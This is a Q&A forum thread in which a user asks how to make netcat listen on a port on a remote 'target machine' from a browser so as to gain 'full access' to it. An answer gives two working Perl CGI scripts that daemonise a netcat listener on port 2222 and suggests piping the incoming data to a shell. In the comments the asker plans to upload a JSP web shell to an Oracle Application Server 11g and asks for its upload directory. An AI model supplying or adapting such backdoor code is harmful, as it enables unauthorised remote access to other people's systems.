# Run Netcat from a Browser

Tags: shell, browser, netcat, listen

i have a Question. Request you to read the scenario as follows:

Let’s say the netcat is already there on a remote machine (Note :It’s not listening to any port).i have the only option to make it start listening on some specific port from my Browser only. So can u please tell me how can i make it start listening, because technically, whenever u access that file remotely, the browser ask u to download/save it.

But what i want is that, i want to run it on the target machine so that i can have full access to that remote machine.

So is it possible to run netcat from a browser on the target Machine???

ThanX in Advance

Answer (score 0):

It is a security risk, but possible, like this. Make a CGI script and place it wherever your server expects to find them - check in your `httpd.conf`. Save the following script as `test.cgi` and make it executable using `chmod`.

```
#!/usr/bin/perl

use strict;
use warnings;
use Proc::Daemon;

print "Content-type: text/plain\n\n";
print "Starting nc...\n";
Proc::Daemon::Init;
`/usr/bin/nc -l 2222`;
```

Now just put the address of the script into your browser's address bar and hit `Enter`. I have just made it listen on port 2222 and do nothing with the incoming data - but you can do whatever you likw with the data you receive - including piping it to a shell for far greater security risk :-)

**Note** You may need to install `Proc::Daemon` into your Perl distro if not already installed.

**Note** You will need to set the `Options ExecCGI` and do `AddHandler cgi-script .cgi`

**Note**

If you cannot, or do not want to install `Proc::Daemon`, you can hack it like this:

```
#!/usr/bin/perl

use strict;
use warnings;

print "Content-type: text/plain\n\n";
print "Starting nc...\n";
my $pid=fork();
die "Unable to fork: $!" if !defined $pid;

if($pid==0){
   # This is the child, run netcat
   open STDIN, "</dev/null";
   open STDOUT,">/dev/null";
   open STDERR,">/dev/null";
   `/usr/bin/nc -l 2222`;
} else {
   print "Child started\n";
}
```

Comment: Thanks mate for replying ....I am gonna try this, but i think there are lot of hassles in it....Well one more thing i forgot to mention that the Target machine has Windows Based OS..& it has Oracle Application Server 11g running on it and that's a J2EE Environment i guess.So alternatively what i was thinking of doing is uploading a JSP shell onto the server. I hope that should be executed. Please correct me if i am wrong. But now the Problem is i don't know how would i get the path to the JSP Shell. This problem can be bypassed if i can get the Folder where the files are uploaded by the admin.

Comment: Like for Xampp, the default folder for uploading files is "htdocs"..likewise do u have any idea about the default directory for a Oracle Application Server 11g if there is any..this would be really helpful man..ThanX

Comment: I suspect you are going to have a problem with the webpage hanging till your `netcat` is finished or timing out, which is why I have done it the way above. Sorry, I know nothing about Oracle or J2EE.